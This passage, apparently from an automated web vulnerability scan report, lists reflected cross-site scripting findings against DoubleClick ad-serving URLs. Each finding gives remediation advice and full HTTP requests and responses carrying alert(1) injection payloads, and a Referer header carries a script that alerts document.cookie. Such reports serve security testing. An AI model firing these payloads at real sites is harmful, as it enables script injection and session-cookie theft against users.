GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L25d83"-alert(1)-"24bc777dba0&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
et/click%3Bh%3Dv8/3b09/f/210/%2a/m%3B239990545%3B0-0%3B0%3B62878001%3B4307-300/250%3B41692150/41709937/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=L25d83"-alert(1)-"24bc777dba0&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcw
...[SNIP]...

3.13. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb8d6"-alert(1)-"3bdf7305698 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=cb8d6"-alert(1)-"3bdf7305698 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7545
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 16 May 2011 12:50:46 GMT
Expires: Mon, 16 May 2011 12:50:46 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Apr 28 10:48:35 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
JTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=cb8d6"-alert(1)-"3bdf7305698http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1bxx_pain");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var
...[SNIP]...

3.14. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be027'-alert(1)-'aa4739289b5 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=be027'-alert(1)-'aa4739289b5 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7537
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 16 May 2011 12:50:51 GMT
Expires: Mon, 16 May 2011 12:50:51 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu May 12 17:46:05 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
JTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=be027'-alert(1)-'aa4739289b5http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1axx_nbap \">
...[SNIP]...

3.15. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b114"-alert(1)-"668a0f0874f was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ5b114"-alert(1)-"668a0f0874f&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7548

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue May 03 11:33:15 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ5b114"-alert(1)-"668a0f0874f&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1axx_line ");
var fscUrl = url;
var fscUrlClickTagFound = fal
...[SNIP]...

3.16. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af04c'-alert(1)-'43db30c6c8d was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQaf04c'-alert(1)-'43db30c6c8d&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7543

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu May 12 17:46:05 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQaf04c'-alert(1)-'43db30c6c8d&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1axx_nbap \">
...[SNIP]...

3.17. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afef5"-alert(1)-"7664da328bf was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313afef5"-alert(1)-"7664da328bf&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7551

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Apr 28 10:48:35 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313afef5"-alert(1)-"7664da328bf&adurl=http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1bxx_pain");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
...[SNIP]...

3.18. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3386a'-alert(1)-'2f70b01d2c3 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-69399757845053133386a'-alert(1)-'2f70b01d2c3&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7548

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue May 03 11:33:15 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-69399757845053133386a'-alert(1)-'2f70b01d2c3&adurl=http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1axx_line \">
...[SNIP]...

3.19. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58695"-alert(1)-"7594321f6a2 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=058695"-alert(1)-"7594321f6a2&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7551

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Apr 28 10:48:35 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=058695"-alert(1)-"7594321f6a2&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1bxx_pain");
var fscUrl = url;
var fscUrlClickTagFound = false;
va
...[SNIP]...

3.20. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64f52'-alert(1)-'352bb153013 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=064f52'-alert(1)-'352bb153013&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7555

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu May 12 18:03:37 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=064f52'-alert(1)-'352bb153013&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_2bxx_good\">
...[SNIP]...

3.21. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8531a'-alert(1)-'f218f4a84b2 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

